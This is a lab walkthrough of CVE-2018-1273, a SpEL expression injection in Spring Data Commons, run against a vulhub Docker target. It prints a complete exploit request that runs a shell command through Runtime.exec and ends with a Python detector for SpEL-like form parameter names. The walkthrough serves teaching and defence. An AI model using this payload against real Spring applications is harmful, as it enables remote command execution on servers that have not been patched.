I. Vulnerability description

Spring Data is an open-source framework that simplifies database access and supports cloud services. Spring Data Commons is the base framework shared by all Spring Data subprojects. Spring Data Commons 2.0.5 and earlier versions contain a SpEL expression injection vulnerability: an attacker can inject a malicious SpEL expression to execute arbitrary commands.

II. Build the vulnerable environment

The tools you need to prepare are as follows:

1. Docker + the vulhub vulnerability library
2. Burp Suite
3. Target machine: an Ubuntu 18.04 virtual machine (others will do)

Open the Ubuntu virtual machine. If Docker and the vulhub vulnerability library are already installed, go straight to the environment directory; if not, install Docker and download vulhub first (there are many tutorials online, so I won't go into that here).

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273#

Run the command

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273# docker-compose up -d

Wait until the following screen appears, which shows that the build has finished.

You can then visit http://your-ip:8080. If the following page appears, the environment was built successfully!

III. Exploitation

1. Register a user and capture the submitted request

2. Construct the payload and send a test request

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.1.17:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://192.168.1.17:8080
Connection: close
Referer: http://192.168.1.17:8080/users
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=

When the server returns the following page, the attack was successful!

3. On the Ubuntu host, enter the container by running

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273# docker-compose exec spring bash

Check the tmp directory: the file 2333 has been created there, so the command was executed successfully!

4. Shut down the Docker environment

docker-compose down
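
A defender-side check for the request in step 2, as an added example that is not part of the original write-up: it scans a form-encoded body for parameter names that carry SpEL syntax instead of a plain property path. The function names and the benign sample body are assumptions made for illustration; the flagged body is the one shown in step 2.

```python
import re
from urllib.parse import unquote_plus

# Body from step 2 of this page, and a benign body constructed for comparison.
PAGE_BODY = ('username[#this.getClass().forName("java.lang.Runtime")'
             '.getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=')
BENIGN_BODY = "username=alice&password=pw&repeatedPassword=pw&address[0].city=Paris"

# What form binding legitimately needs: identifiers, dots, simple indexes.
_SEG = r"[A-Za-z_$][\w$]*(?:\[[\w$-]*\])*"
SAFE_NAME = re.compile(rf"^{_SEG}(?:\.{_SEG})*$")

# Tokens that only make sense if the name is evaluated as an expression.
SPEL_MARKERS = [
    (re.compile(r"#\w+"), "variable reference such as #this"),
    (re.compile(r"\bT\s*\("), "type reference T(...)"),
    (re.compile(r"\bnew\s+[\w.]+\s*\("), "constructor call"),
    (re.compile(r"\.\s*\w+\s*\("), "method invocation"),
]

def param_names(body):
    """Yield decoded parameter names from an x-www-form-urlencoded body."""
    for pair in body.split("&"):
        if pair:
            raw = pair.split("=", 1)[0]
            # Decode twice so a double-encoded name is still inspected in clear.
            yield unquote_plus(unquote_plus(raw))

def inspect_body(body):
    """Return [(name, reasons)] for parameter names that look like SpEL."""
    findings = []
    for name in param_names(body):
        reasons = [why for rx, why in SPEL_MARKERS if rx.search(name)]
        if not reasons and not SAFE_NAME.match(name):
            reasons = ["not a plain property path"]
        if reasons:
            findings.append((name, reasons))
    return findings

if __name__ == "__main__":
    for label, body in (("step 2 body", PAGE_BODY), ("benign body", BENIGN_BODY)):
        print(label, "->", inspect_body(body) or "clean")
```

A match is a signal for triage or for a blocking rule in front of the application; it does not replace upgrading Spring Data Commons beyond the affected versions.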
